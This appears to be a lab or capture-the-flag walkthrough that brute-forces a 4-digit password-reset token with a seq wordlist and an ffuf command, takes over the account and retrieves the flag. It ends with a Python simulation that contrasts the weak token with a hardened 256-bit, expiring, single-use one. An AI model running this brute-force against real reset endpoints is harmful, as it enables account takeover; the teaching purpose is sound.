To exploit the password reset functionality, we must first find the reset endpoint.
Step 1 - Access the Web Application and Reset the Password:
Step 2 - Insert a username and click Submit:
Step 3 - Click on here:
Step 4 - Get the password reset token endpoint:
You'll get this warning; click Submit again:
And we get the endpoint: reset_password.php, which takes the reset token as a token parameter:
Step 5 - Brute-force the reset token:
Create a numeric wordlist with every 4-digit value from 0000 to 9999, zero-padded so each candidate has the same length as the token:
Use the wordlist to brute-force the token with ffuf, filtering out the "The provided token is invalid" responses so that only the valid token is shown:
Step 6 - Reset the password:
Insert the valid token at the end of the URL (the token parameter of reset_password.php):
Change the password:
Step 7 - Retrieve the flag:
After resetting the password, log in to the application with the new credentials and retrieve the flag:
Commands used in the brute-force step:
# zero-padded 4-digit wordlist, 0000 to 9999 (10,000 candidates)
seq -w 0 9999 > tokens.txt
# FUZZ is replaced by each wordlist line; -fr drops every response whose body matches the invalid-token message, so the valid token is the only hit. The URL is quoted so the shell does not treat ? as a glob.
ffuf -w ./tokens.txt -u "http://SERVER_IP:SERVER_PORT/reset_password.php?token=FUZZ" -fr "The provided token is invalid"
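The whole attack above works because the reset token has only 10,000 possible values and the endpoint answers every guess. The following is an added example, not the lab's code: it simulates the reset_password.php token check in-process (no HTTP is sent), runs the same 0000-9999 wordlist against it the way ffuf -fr does, and shows the hardened version of the same endpoint (a 256-bit token, expiry and single use) that the brute-force cannot crack. The ResetEndpoint class, the invalid-token message and the 15-minute TTL are assumptions made for the demo.

```python
"""Simulated password-reset token brute-force, and the hardened fix.

Added example: models the page's /reset_password.php?token=... check
in-process so it runs offline. Not the lab's own code.
"""
import secrets
import time
from typing import Iterable, Optional

# The body text ffuf -fr filters on (assumed to match the lab's message).
INVALID_MSG = "The provided token is invalid"


def weak_token(digits: int = 4) -> str:
    """Vulnerable generator: a zero-padded numeric token, 10**digits values."""
    return f"{secrets.randbelow(10 ** digits):0{digits}d}"


def strong_token() -> str:
    """Hardened generator: 32 random bytes (256 bits) as URL-safe base64."""
    return secrets.token_urlsafe(32)


class ResetEndpoint:
    """Simulated reset endpoint (constructed for this example).

    Regardless of the token used, it enforces expiry and single use,
    so the only thing that changes between weak and strong is the keyspace.
    """

    def __init__(self, token: str, ttl_seconds: int = 900):
        self.token = token
        self.issued = time.monotonic()
        self.ttl = ttl_seconds        # assumed 15-minute validity window
        self.used = False
        self.requests = 0             # how many guesses the server saw

    def get(self, token: str) -> str:
        """Response body for GET /reset_password.php?token=<token>."""
        self.requests += 1
        expired = time.monotonic() - self.issued > self.ttl
        if self.used or expired or not secrets.compare_digest(token, self.token):
            return INVALID_MSG
        self.used = True              # single use: burned on first success
        return "<form>Enter your new password</form>"


def numeric_wordlist(digits: int = 4) -> Iterable[str]:
    """Same candidates as `seq -w 0 9999 > tokens.txt`."""
    return (f"{i:0{digits}d}" for i in range(10 ** digits))


def brute_force(endpoint: ResetEndpoint, candidates: Iterable[str],
                max_attempts: int = 10_000) -> Optional[str]:
    """Mirror ffuf -fr: return the first guess whose body lacks INVALID_MSG."""
    for attempts, guess in enumerate(candidates, start=1):
        if attempts > max_attempts:
            break
        if INVALID_MSG not in endpoint.get(guess):
            return guess
    return None


if __name__ == "__main__":
    weak = ResetEndpoint(weak_token())
    hit = brute_force(weak, numeric_wordlist())
    print(f"weak endpoint: token {hit} found after {weak.requests} requests")

    strong = ResetEndpoint(strong_token())
    print("strong endpoint:", brute_force(strong, numeric_wordlist()),
          f"after {strong.requests} requests")
```

The weak endpoint always falls within 10,000 requests; the hardened one never does, because a 43-character base64 token is not in a numeric wordlist and a 256-bit keyspace cannot be enumerated at all. Expiry and single use are still worth keeping on the hardened endpoint: they bound the window in which a leaked or guessed token is useful.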